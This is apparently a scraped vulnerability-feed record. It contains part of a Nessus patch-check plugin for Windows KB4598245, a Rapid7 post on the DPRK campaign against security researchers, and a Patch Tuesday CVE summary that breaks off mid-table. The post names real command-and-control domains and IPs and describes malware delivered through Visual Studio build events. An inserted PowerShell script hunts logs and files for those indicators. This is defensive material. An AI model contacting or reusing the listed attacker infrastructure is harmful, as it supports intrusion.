Vulnerability This CVE ID is unique from CVE-2021-1652,\n CVE-2021-1653, CVE-2021-1655, CVE-2021-1659, CVE-2021-1688, CVE-2021-1693. (CVE-2021-1654)\n\n - Windows CSC Service Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-1652,\n CVE-2021-1653, CVE-2021-1654, CVE-2021-1659, CVE-2021-1688, CVE-2021-1693. (CVE-2021-1655)\n\n - TPM Device Driver Information Disclosure Vulnerability (CVE-2021-1656)\n\n - Windows Fax Compose Form Remote Code Execution Vulnerability (CVE-2021-1657)\n\n - Remote Procedure Call Runtime Remote Code Execution Vulnerability This CVE ID is unique from\n CVE-2021-1660, CVE-2021-1664, CVE-2021-1666, CVE-2021-1667, CVE-2021-1671, CVE-2021-1673, CVE-2021-1700,\n CVE-2021-1701. (CVE-2021-1658)\n\n - Windows CSC Service Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-1652,\n CVE-2021-1653, CVE-2021-1654, CVE-2021-1655, CVE-2021-1688, CVE-2021-1693. 
(CVE-2021-1659)\n\n - Remote Procedure Call Runtime Remote Code Execution Vulnerability This CVE ID is unique from\n CVE-2021-1658, CVE-2021-1664, CVE-2021-1666, CVE-2021-1667, CVE-2021-1671, CVE-2021-1673, CVE-2021-1700,\n CVE-2021-1701. (CVE-2021-1660)\n\n - Windows Installer Elevation of Privilege Vulnerability (CVE-2021-1661)\n\n - Windows Event Tracing Elevation of Privilege Vulnerability (CVE-2021-1662)\n\n - Remote Procedure Call Runtime Remote Code Execution Vulnerability This CVE ID is unique from\n CVE-2021-1658, CVE-2021-1660, CVE-2021-1666, CVE-2021-1667, CVE-2021-1671, CVE-2021-1673, CVE-2021-1700,\n CVE-2021-1701. (CVE-2021-1664)\n\n - GDI+ Remote Code Execution Vulnerability (CVE-2021-1665)\n\n - Remote Procedure Call Runtime Remote Code Execution Vulnerability This CVE ID is unique from\n CVE-2021-1658, CVE-2021-1660, CVE-2021-1664, CVE-2021-1667, CVE-2021-1671, CVE-2021-1673, CVE-2021-1700,\n CVE-2021-1701. (CVE-2021-1666)\n\n - Remote Procedure Call Runtime Remote Code Execution Vulnerability This CVE ID is unique from\n CVE-2021-1658, CVE-2021-1660, CVE-2021-1664, CVE-2021-1666, CVE-2021-1671, CVE-2021-1673, CVE-2021-1700,\n CVE-2021-1701. (CVE-2021-1667)\n\n - Microsoft DTV-DVD Video Decoder Remote Code Execution Vulnerability (CVE-2021-1668)\n\n - Windows Remote Desktop Security Feature Bypass Vulnerability (CVE-2021-1669)\n\n - Remote Procedure Call Runtime Remote Code Execution Vulnerability This CVE ID is unique from\n CVE-2021-1658, CVE-2021-1660, CVE-2021-1664, CVE-2021-1666, CVE-2021-1667, CVE-2021-1673, CVE-2021-1700,\n CVE-2021-1701. (CVE-2021-1671)\n\n - Windows Projected File System FS Filter Driver Information Disclosure Vulnerability This CVE ID is unique\n from CVE-2021-1663, CVE-2021-1670. (CVE-2021-1672)\n\n - Remote Procedure Call Runtime Remote Code Execution Vulnerability This CVE ID is unique from\n CVE-2021-1658, CVE-2021-1660, CVE-2021-1664, CVE-2021-1666, CVE-2021-1667, CVE-2021-1671, CVE-2021-1700,\n CVE-2021-1701. 
(CVE-2021-1673)\n\n - Windows Remote Desktop Protocol Core Security Feature Bypass Vulnerability (CVE-2021-1674)\n\n - Windows NT Lan Manager Datagram Receiver Driver Information Disclosure Vulnerability (CVE-2021-1676)\n\n - Windows CryptoAPI Denial of Service Vulnerability (CVE-2021-1679)\n\n - Diagnostics Hub Standard Collector Elevation of Privilege Vulnerability This CVE ID is unique from\n CVE-2021-1651. (CVE-2021-1680)\n\n - Windows WalletService Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-1686,\n CVE-2021-1687, CVE-2021-1690. (CVE-2021-1681)\n\n - Windows Kernel Elevation of Privilege Vulnerability (CVE-2021-1682)\n\n - Windows Bluetooth Security Feature Bypass Vulnerability This CVE ID is unique from CVE-2021-1638,\n CVE-2021-1684. (CVE-2021-1683)\n\n - Windows Bluetooth Security Feature Bypass Vulnerability This CVE ID is unique from CVE-2021-1638,\n CVE-2021-1683. (CVE-2021-1684)\n\n - Windows AppX Deployment Extensions Elevation of Privilege Vulnerability This CVE ID is unique from\n CVE-2021-1642. (CVE-2021-1685)\n\n - Windows WalletService Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-1681,\n CVE-2021-1687, CVE-2021-1690. (CVE-2021-1686)\n\n - Windows WalletService Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-1681,\n CVE-2021-1686, CVE-2021-1690. (CVE-2021-1687)\n\n - Windows CSC Service Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-1652,\n CVE-2021-1653, CVE-2021-1654, CVE-2021-1655, CVE-2021-1659, CVE-2021-1693. (CVE-2021-1688)\n\n - Windows Multipoint Management Elevation of Privilege Vulnerability (CVE-2021-1689)\n\n - Windows WalletService Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-1681,\n CVE-2021-1686, CVE-2021-1687. 
(CVE-2021-1690)\n\n - Windows CSC Service Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-1652,\n CVE-2021-1653, CVE-2021-1654, CVE-2021-1655, CVE-2021-1659, CVE-2021-1688. (CVE-2021-1693)\n\n - Windows Update Stack Elevation of Privilege Vulnerability (CVE-2021-1694)\n\n - Windows Print Spooler Elevation of Privilege Vulnerability (CVE-2021-1695)\n\n - Windows Graphics Component Information Disclosure Vulnerability (CVE-2021-1696)\n\n - Windows InstallService Elevation of Privilege Vulnerability (CVE-2021-1697)\n\n - Windows GDI+ Information Disclosure Vulnerability (CVE-2021-1708)\n\n - Windows Win32k Elevation of Privilege Vulnerability (CVE-2021-1709)\n\n - Microsoft Windows Media Foundation Remote Code Execution Vulnerability (CVE-2021-1710)\n\n - Windows Runtime C++ Template Library Elevation of Privilege Vulnerability (CVE-2021-1650)\n\n - Active Template Library Elevation of Privilege Vulnerability (CVE-2021-1649)\n\n - Microsoft splwow64 Elevation of Privilege Vulnerability (CVE-2021-1648)\n\n - Windows WLAN Service Elevation of Privilege Vulnerability (CVE-2021-1646)\n\n - Windows Bluetooth Security Feature Bypass Vulnerability This CVE ID is unique from CVE-2021-1683,\n CVE-2021-1684. (CVE-2021-1638)\n\n - NTLM Security Feature Bypass Vulnerability (CVE-2021-1678)\n\n - Windows (modem.sys) Information Disclosure Vulnerability (CVE-2021-1699)\n\n - Remote Procedure Call Runtime Remote Code Execution Vulnerability This CVE ID is unique from\n CVE-2021-1658, CVE-2021-1660, CVE-2021-1664, CVE-2021-1666, CVE-2021-1667, CVE-2021-1671, CVE-2021-1673,\n CVE-2021-1701. (CVE-2021-1700)\n\n - Remote Procedure Call Runtime Remote Code Execution Vulnerability This CVE ID is unique from\n CVE-2021-1658, CVE-2021-1660, CVE-2021-1664, CVE-2021-1666, CVE-2021-1667, CVE-2021-1671, CVE-2021-1673,\n CVE-2021-1700. 
(CVE-2021-1701)\n\n - Windows Remote Procedure Call Runtime Elevation of Privilege Vulnerability (CVE-2021-1702)\n\n - Windows Hyper-V Elevation of Privilege Vulnerability (CVE-2021-1704)\n\n - Microsoft Edge (HTML-based) Memory Corruption Vulnerability (CVE-2021-1705)\n\n - Windows LUAFV Elevation of Privilege Vulnerability (CVE-2021-1706)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.\");\n # https://support.microsoft.com/en-us/help/4598245/windows-10-update-kb4598245\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?c8f58c04\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Cumulative Update KB4598245.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-1668\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/01/12\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/01/12\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/01/12\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2021 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude('smb_func.inc');\ninclude('smb_hotfixes.inc');\ninclude('smb_hotfixes_fcheck.inc');\ninclude('smb_reg_query.inc');\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nbulletin = 'MS21-01';\nkbs = make_list(\n '4598245'\n);\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit('SMB/Registry/Enumerated');\nget_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\n\nif (hotfix_check_sp_range(win10:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:'10',\n sp:0,\n os_build:'17134',\n rollup_date:'01_2021',\n bulletin:bulletin,\n rollup_kb_list:[4598245])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "rapid7blog": [{"lastseen": "2021-02-05T20:48:49", "bulletinFamily": "info", "cvelist": ["CVE-2021-1647"], "description": "\n\n_This blog was co-authored by Caitlin Condon, VRM Security Research Manager, and Bob Rudis, Senior Director and Chief Security Data Scientist._\n\nOn Monday, Jan. 
25, 2021, Google\u2019s Threat Analysis Group (TAG) [published a blog on a widespread social engineering campaign](<https://blog.google/threat-analysis-group/new-campaign-targeting-security-researchers/>) that targeted security researchers working on vulnerability research and development. The campaign, which Google attributed to North Korean (DPRK) state-sponsored actors, has been active for several months and sought to compromise researchers using several methods.\n\nRapid7 is aware that many security researchers were targeted in this campaign, and information is still developing. While we currently have no evidence that we were compromised, we are continuing to investigate logs and examine our systems for any of the [IOCs listed in Google\u2019s analysis](<https://blog.google/threat-analysis-group/new-campaign-targeting-security-researchers/>). We will update this post with further information as it becomes available.\n\nOrganizations should take note that this was a highly sophisticated attack that was important enough to those who orchestrated it for them to burn an as-yet unknown exploit path on. This event is the latest in a chain of attacks\u2014e.g., those targeting SonicWall, VMware, Mimecast, Malwarebytes, Microsoft, Crowdstrike, and SolarWinds\u2014that demonstrates a significant increase in threat activity targeting cybersecurity firms with legitimately sophisticated campaigns. Scenarios like these should become standard components of tabletop exercises and active defense plans.\n\n## North Korean-attributed social engineering campaign\n\nGoogle discovered that the DPRK threat actors had built credibility by establishing a vulnerability research blog and several Twitter profiles to interact with potential targets. 
They published videos of their alleged exploits, including a YouTube video of a fake proof-of-concept (PoC) exploit for CVE-2021-1647\u2014a [high-profile Windows Defender zero-day vulnerability](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-1647>) that garnered attention from both security researchers and the media. The DPRK actors also published \u201cguest\u201d research (likely plagiarized from other researchers) on their blog to further build their reputation.\n\nThe malicious actors then used two methods to social engineer targets into accepting malware or visiting a malicious website. [According to Google](<https://blog.google/threat-analysis-group/new-campaign-targeting-security-researchers/>):\n\n * After establishing initial communications, **the actors would ask the targeted researcher if they wanted to collaborate on vulnerability research together, and then provide the researcher with a Visual Studio Project.** Within the Visual Studio Project would be source code for exploiting the vulnerability, as well as an additional pre-compiled library (DLL) that would be executed through Visual Studio Build Events. The DLL is custom malware that would immediately begin communicating with actor-controlled command and control (C2) domains.\nVisual Studio Build Events command executed when building the provided VS Project files. Image provided by Google.\n\n * In addition to targeting users via social engineering, Google also observed several cases where researchers have been compromised after visiting the actors\u2019 blog. In each of these cases, the researchers followed a link on Twitter to a write-up hosted on `blog[.]br0vvnn[.]io`, and shortly thereafter, a malicious service was installed on the researcher\u2019s system and an in-memory backdoor would begin beaconing to an actor-owned command and control server. 
**At the time of these visits, the victim systems were running fully patched and up-to-date Windows 10 and Chrome browser versions.** As of Jan. 26, 2021, Google was unable to confirm the mechanism of compromise.\n\nThe blog the DPRK threat actors used to execute this zero-day drive-by attack was posted on Reddit as long as three months ago. The actors also used a range of social media and communications platforms to interact with targets\u2014including Telegram, Keybase, Twitter, LinkedIn, and Discord. As of Jan. 26, 2021, many of these profiles have been suspended or deactivated.\n\n## Rapid7 customers\n\nGoogle\u2019s threat intelligence includes information on IOCs, command-and-control domains, actor-controlled social media accounts, and compromised domains used as part of the campaign. Rapid7's MDR team is deploying IOCs and behavior-based detections. These detections will also be available to InsightIDR customers later today. We will update this blog post with further information as it becomes available.\n\n## Defender guidance\n\nTAG noted in their blog post that **they have so far only seen actors targeting Windows systems.** As of the evening of Jan. 25, 2021, researchers across many companies [confirmed on Twitter](<https://twitter.com/richinseattle/status/1353864756109578241>) that they had interacted with the DPRK actors and/or visited the malicious blog. 
Organizations that believe their researchers or other employees may have been targeted should conduct internal investigations to determine whether indicators of compromise are present on their networks.\n\nAt a minimum, responders should:\n\n * Ensure members of all security teams are aware of this campaign and encourage individuals to report if they believe they were targeted by these actors.\n * Search web traffic, firewall, and DNS logs for evidence of contacts to the domains and URLs provided by Google in their post.\n * According to [Rapid7 Labs\u2019 forward DNS archive](<https://opendata.rapid7.com>), the `br0vvnn[.]io` apex domain has had two discovered fully qualified domain names (FQDNs)\u2014`api[.]br0vvnn[.]io` and `blog[.]br0vvnn[.]io`\u2014over the past four months with IP addresses `192[.]169[.]6[.]31` and `192[.]52[.]167[.]169`, respectively. Contacts to those IPs should also be investigated in historical access records.\n * Check for evidence of the provided hashes on all systems, starting with those operated and accessed by members of security teams.\n\nMoving forward, organizations and individuals should heed Google\u2019s advice that _\u201cif you are concerned that you are being targeted, we recommend that you compartmentalize your research activities using separate physical or virtual machines for general web browsing, interacting with others in the research community, accepting files from third parties and your own security research.\u201d_\n\n## Updates\n\n2021-02-05 \u2022 As Rapid7 is a cybersecurity vendor with many security researchers on staff, we began an internal investigation immediately after this campaign was disclosed to determine if there was any impact to us or our researchers. We have completed our investigation and have found no evidence of compromise. 
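The log search and hash check from the responder list above, as an added PowerShell example that is not part of Rapid7's post. The domain, FQDN and IP indicators are the ones named in that list; the sample log lines, the Sysmon event source and the hash-file name are constructed assumptions.

```powershell
# Added example, not code from Rapid7's post. Indicators are the ones named above: the apex
# br0vvnn[.]io (matching api. and blog. as well) and the IPs 192[.]169[.]6[.]31 and
# 192[.]52[.]167[.]169. Sample log lines, the Sysmon source and the hash-file name are assumptions.
$IocDomains = @('br0vvnn.io')
$IocIps     = @('192.169.6.31', '192.52.167.169')

function Find-IocInLogLines {
    # Scan exported proxy/firewall/DNS text logs, one line at a time, for domain or IP indicators.
    param(
        [Parameter(Mandatory, ValueFromPipeline)] [string[]] $Lines,
        [string[]] $Domains = $IocDomains,
        [string[]] $Ips     = $IocIps
    )
    begin {
        # Label boundaries: blog.br0vvnn.io and br0vvnn.io match, notbr0vvnn.io does not; dots are escaped.
        $domainRx = ($Domains | ForEach-Object {
            '(?<![A-Za-z0-9-])(?:[A-Za-z0-9-]+\.)*' + [regex]::Escape($_) + '(?![A-Za-z0-9-])' }) -join '|'
        # Whole octets only: 192.169.6.31 must not match 192.169.6.310 or 1192.169.6.31.
        $ipRx = ($Ips | ForEach-Object { '(?<![0-9.])' + [regex]::Escape($_) + '(?![0-9.])' }) -join '|'
    }
    process {
        foreach ($line in $Lines) {
            $m = [regex]::Match($line, $domainRx, 'IgnoreCase')
            if (-not $m.Success) { $m = [regex]::Match($line, $ipRx) }
            if ($m.Success) { [pscustomobject]@{ Indicator = $m.Value; Line = $line } }
        }
    }
}

function Find-IocInSysmonDns {
    # Endpoint-side view: Sysmon Event ID 22 (DnsQuery) records the queried name and the querying image.
    param([string[]] $Domains = $IocDomains, [int] $Days = 120)
    $rx = ($Domains | ForEach-Object { '(?:^|\.)' + [regex]::Escape($_) + '$' }) -join '|'
    $filter = @{ LogName = 'Microsoft-Windows-Sysmon/Operational'; Id = 22; StartTime = (Get-Date).AddDays(-$Days) }
    Get-WinEvent -FilterHashtable $filter -ErrorAction SilentlyContinue | ForEach-Object {
        $data  = ([xml] $_.ToXml()).Event.EventData.Data
        $query = ($data | Where-Object Name -eq 'QueryName').'#text'
        if ($query -match $rx) {
            [pscustomobject]@{ Time = $_.TimeCreated; Query = $query; Image = ($data | Where-Object Name -eq 'Image').'#text' }
        }
    }
}

function Find-KnownBadFiles {
    # SHA-256 sweep of the places a researcher would have saved a received project or download.
    param(
        [Parameter(Mandatory)] [string[]] $KnownBadSha256,   # paste the hashes from Google's post
        [string[]] $Roots = @("$env:USERPROFILE\Downloads", "$env:USERPROFILE\source", $env:TEMP)
    )
    $bad = $KnownBadSha256 | ForEach-Object { $_.Trim().ToUpperInvariant() }   # Get-FileHash emits upper-case hex
    Get-ChildItem -Path $Roots -Recurse -File -ErrorAction SilentlyContinue | ForEach-Object {
        $h = (Get-FileHash -LiteralPath $_.FullName -Algorithm SHA256 -ErrorAction SilentlyContinue).Hash
        if ($h -and $bad -contains $h) { [pscustomobject]@{ Path = $_.FullName; Sha256 = $h } }
    }
}

# Constructed sample export; only the second and third lines are true hits.
$sample = @(
    '2021-01-20T10:02:11Z 10.1.4.22 GET https://notbr0vvnn.io/ 200',
    '2021-01-20T10:05:43Z 10.1.4.22 GET https://blog.br0vvnn.io/pages/blogpost.aspx?id=1&q=1 200',
    '2021-01-20T10:05:44Z dns query from 10.1.4.22: api.br0vvnn.io A 192.169.6.31',
    '2021-01-20T10:07:00Z 10.1.4.23 CONNECT 192.169.6.310:443'
)
$sample | Find-IocInLogLines | Format-Table -AutoSize
# Real data (file names are placeholders):
#   Get-Content .\proxy-export.log | Find-IocInLogLines
#   Find-IocInSysmonDns
#   Find-KnownBadFiles -KnownBadSha256 (Get-Content .\tag-hashes.txt)
```

The regexes are deliberately strict: a substring search for `br0vvnn.io` or `192.169.6.31` returns look-alike hosts and longer IPs, and those false positives are exactly what slows an investigation when the sweep runs across months of proxy logs. Searching Sysmon DNS events alongside the network logs matters because the campaign's backdoor ran in memory; the querying image is often the only artefact left on the host.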
If or when new information arises, we will perform additional investigations and provide further updates at that time.\n", "modified": "2021-01-26T15:01:33", "published": "2021-01-26T15:01:33", "id": "RAPID7BLOG:BE902C7628D3F969596F8BE1DD0207C1", "href": "https://blog.rapid7.com/2021/01/26/state-sponsored-threat-actors-target-security-researchers/", "type": "rapid7blog", "title": "State-Sponsored Threat Actors Target Security Researchers", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-15T00:48:37", "bulletinFamily": "info", "cvelist": ["CVE-2020-26870", "CVE-2021-1636", "CVE-2021-1637", "CVE-2021-1638", "CVE-2021-1641", "CVE-2021-1642", "CVE-2021-1643", "CVE-2021-1644", "CVE-2021-1645", "CVE-2021-1646", "CVE-2021-1647", "CVE-2021-1648", "CVE-2021-1649", "CVE-2021-1650", "CVE-2021-1651", "CVE-2021-1652", "CVE-2021-1653", "CVE-2021-1654", "CVE-2021-1655", "CVE-2021-1656", "CVE-2021-1657", "CVE-2021-1658", "CVE-2021-1659", "CVE-2021-1660", "CVE-2021-1661", "CVE-2021-1662", "CVE-2021-1663", "CVE-2021-1664", "CVE-2021-1665", "CVE-2021-1666", "CVE-2021-1667", "CVE-2021-1668", "CVE-2021-1669", "CVE-2021-1670", "CVE-2021-1671", "CVE-2021-1672", "CVE-2021-1673", "CVE-2021-1674", "CVE-2021-1676", "CVE-2021-1677", "CVE-2021-1678", "CVE-2021-1679", "CVE-2021-1680", "CVE-2021-1681", "CVE-2021-1682", "CVE-2021-1683", "CVE-2021-1684", "CVE-2021-1685", "CVE-2021-1686", "CVE-2021-1687", "CVE-2021-1688", "CVE-2021-1689", "CVE-2021-1690", "CVE-2021-1691", "CVE-2021-1692", "CVE-2021-1693", "CVE-2021-1694", "CVE-2021-1695", "CVE-2021-1696", "CVE-2021-1697", "CVE-2021-1699", "CVE-2021-1700", "CVE-2021-1701", "CVE-2021-1702", "CVE-2021-1703", "CVE-2021-1704", "CVE-2021-1705", "CVE-2021-1706", "CVE-2021-1707", "CVE-2021-1708", "CVE-2021-1709", "CVE-2021-1710", "CVE-2021-1711", "CVE-2021-1712", "CVE-2021-1713", "CVE-2021-1714", "CVE-2021-1715", 
"CVE-2021-1716", "CVE-2021-1717", "CVE-2021-1718", "CVE-2021-1719", "CVE-2021-1723", "CVE-2021-1725"], "description": "\n\nWe arrive at the first Patch Tuesday of 2021 ([2021-Jan](<https://msrc.microsoft.com/update-guide/releaseNote/2021-Jan>)) with 83 vulnerabilities across our standard spread of products. Windows Operating System vulnerabilities dominated this month's advisories, followed by Microsoft Office (which includes the SharePoint family of products), and lastly a few from less frequently patched products such as Microsoft System Center and Microsoft SQL Server.\n\n### Vulnerability Breakdown by Software Family\n\nFamily | Vulnerability Count \n---|--- \nWindows | 65 \nESU | 35 \nMicrosoft Office | 11 \nDeveloper Tools | 5 \nSQL Server | 1 \nApps | 1 \nSystem Center | 1 \nAzure | 1 \nBrowser | 1 \n \n### [Microsoft Defender Remote Code Execution Vulnerability](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-1647>) (CVE-2021-1647)\n\nCVE-2021-1647 is a CVSS 7.8, actively exploited remote code execution vulnerability in the Microsoft Malware Protection Engine (mpengine.dll). Per Microsoft's advisory, engine builds up to and including 1.1.17600.5 are affected and 1.1.17700.4 is the first fixed build. \n\nBy default, the affected antimalware products keep the Malware Protection Engine current on their own, so no further action is needed unless a non-standard configuration blocks that update, for example hosts kept off the internet or with automatic engine updates disabled; on those hosts the fixed engine has to be applied manually, and reading the engine version is the only way to tell which case a host is in. \n\nThis vulnerability affects Windows Defender and the supported Endpoint Protection components of the System Center family of products (2012, 2012 R2, and the namesake Microsoft System Center Endpoint Protection).\n\n### Patching Windows Operating Systems Next\n\nAnother confirmation of the standard advice to prioritize Operating System patches whenever possible: 11 of the 13 top CVSS-scoring (CVSSv3 8.8) vulnerabilities addressed in this month's Patch Tuesday would be covered by OS patching alone. 
As an interesting observation, the Windows Remote Procedure Call Runtime component appears to have been given extra scrutiny this month: it accounts for 9 of the 13 top CVSS-scoring vulnerabilities and for half of the 10 Critical Remote Code Execution vulnerabilities being addressed.\n\n### More Work to be Done\n\nLastly, two minor notes: this Patch Tuesday includes SQL Server, an atypical family for a Patch Tuesday, and, arguably more notable, it is a reminder that [Adobe Flash has officially reached end-of-life](<https://docs.microsoft.com/en-us/lifecycle/announcements/adobe-flash-end-of-support>) and is being removed from Windows, and so from its browsers, via Windows Update.\n\n## Summary Tables\n\nHere are this month's patched vulnerabilities split by the product family.\n\n## Azure Vulnerabilities\n\nCVE | Vulnerability Title | Exploited | Disclosed | CVSS3 | FAQ? \n---|---|---|---|---|--- \n[CVE-2021-1677](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1677>) | Azure Active Directory Pod Identity Spoofing Vulnerability | No | No | 5.5 | Yes \n \n## Browser Vulnerabilities\n\nCVE | Vulnerability Title | Exploited | Disclosed | CVSS3 | FAQ? \n---|---|---|---|---|--- \n[CVE-2021-1705](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1705>) | Microsoft Edge (HTML-based) Memory Corruption Vulnerability | No | No | 4.2 | No \n \n## Developer Tools Vulnerabilities\n\nCVE | Vulnerability Title | Exploited | Disclosed | CVSS3 | FAQ? 
\n---|---|---|---|---|--- \n[CVE-2020-26870](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-26870>) | Visual Studio Remote Code Execution Vulnerability | No | No | 7 | Yes \n[CVE-2021-1725](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1725>) | Bot Framework SDK Information Disclosure Vulnerability | No | No | 5.5 | Yes \n[CVE-2021-1723](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1723>) | ASP.NET Core and Visual Studio Denial of Service Vulnerability | No | No | 7.5 | No \n \n## Developer Tools Windows Vulnerabilities\n\nCVE | Vulnerability Title | Exploited | Disclosed | CVSS3 | FAQ? \n---|---|---|---|---|--- \n[CVE-2021-1651](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1651>) | Diagnostics Hub Standard Collector Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2021-1680](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1680>) | Diagnostics Hub Standard Collector Elevation of Privilege Vulnerability | No | No | 7.8 | No \n \n## Microsoft Office Vulnerabilities\n\nCVE | title | Exploited | Disclosed | CVSS3 | FAQ? 
\n---|---|---|---|---|--- \n[CVE-2021-1715](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1715>) | Microsoft Word Remote Code Execution Vulnerability | No | No | 7.8 | Yes \n[CVE-2021-1716](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1716>) | Microsoft Word Remote Code Execution Vulnerability | No | No | 7.8 | Yes \n[CVE-2021-1641](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1641>) | Microsoft SharePoint Spoofing Vulnerability | No | No | 4.6 | No \n[CVE-2021-1717](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1717>) | Microsoft SharePoint Spoofing Vulnerability | No | No | 4.6 | No \n[CVE-2021-1718](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1718>) | Microsoft SharePoint Server Tampering Vulnerability | No | No | 8 | No \n[CVE-2021-1707](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1707>) | Microsoft SharePoint Server Remote Code Execution Vulnerability | No | No | 8.8 | Yes \n[CVE-2021-1712](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1712>) | Microsoft SharePoint Elevation of Privilege Vulnerability | No | No | 8 | No \n[CVE-2021-1719](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1719>) | Microsoft SharePoint Elevation of Privilege Vulnerability | No | No | 8 | No \n[CVE-2021-1711](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1711>) | Microsoft Office Remote Code Execution Vulnerability | No | No | 7.8 | Yes \n[CVE-2021-1713](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1713>) | Microsoft Excel Remote Code Execution Vulnerability | No | No | 7.8 | Yes \n[CVE-2021-1714](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1714>) | Microsoft Excel Remote Code Execution Vulnerability | No | No | 7.8 | Yes \n \n## SQL Server 
Vulnerabilities\n\nCVE | title | Exploited | Disclosed | CVSS3 | FAQ? \n---|---|---|---|---|--- \n[CVE-2021-1636](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1636>) | Microsoft SQL Elevation of Privilege Vulnerability | No | No | 8.8 | Yes \n \n## System Center Vulnerabilities\n\nCVE | title | Exploited | Disclosed | CVSS3 | FAQ? \n---|---|---|---|---|--- \n[CVE-2021-1647](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1647>) | Microsoft Defender Remote Code Execution Vulnerability | Yes | No | 7.8 | Yes \n \n## Windows Vulnerabilities\n\nCVE | title | Exploited | Disclosed | CVSS3 | FAQ? \n---|---|---|---|---|--- \n[CVE-2021-1681](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1681>) | Windows WalletService Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2021-1686](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1686>) | Windows WalletService Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2021-1687](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1687>) | Windows WalletService Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2021-1690](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1690>) | Windows WalletService Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2021-1646](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1646>) | Windows WLAN Service Elevation of Privilege Vulnerability | No | No | 6.6 | No \n[CVE-2021-1650](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1650>) | Windows Runtime C++ Template Library Elevation of Privilege Vulnerability | No | No | 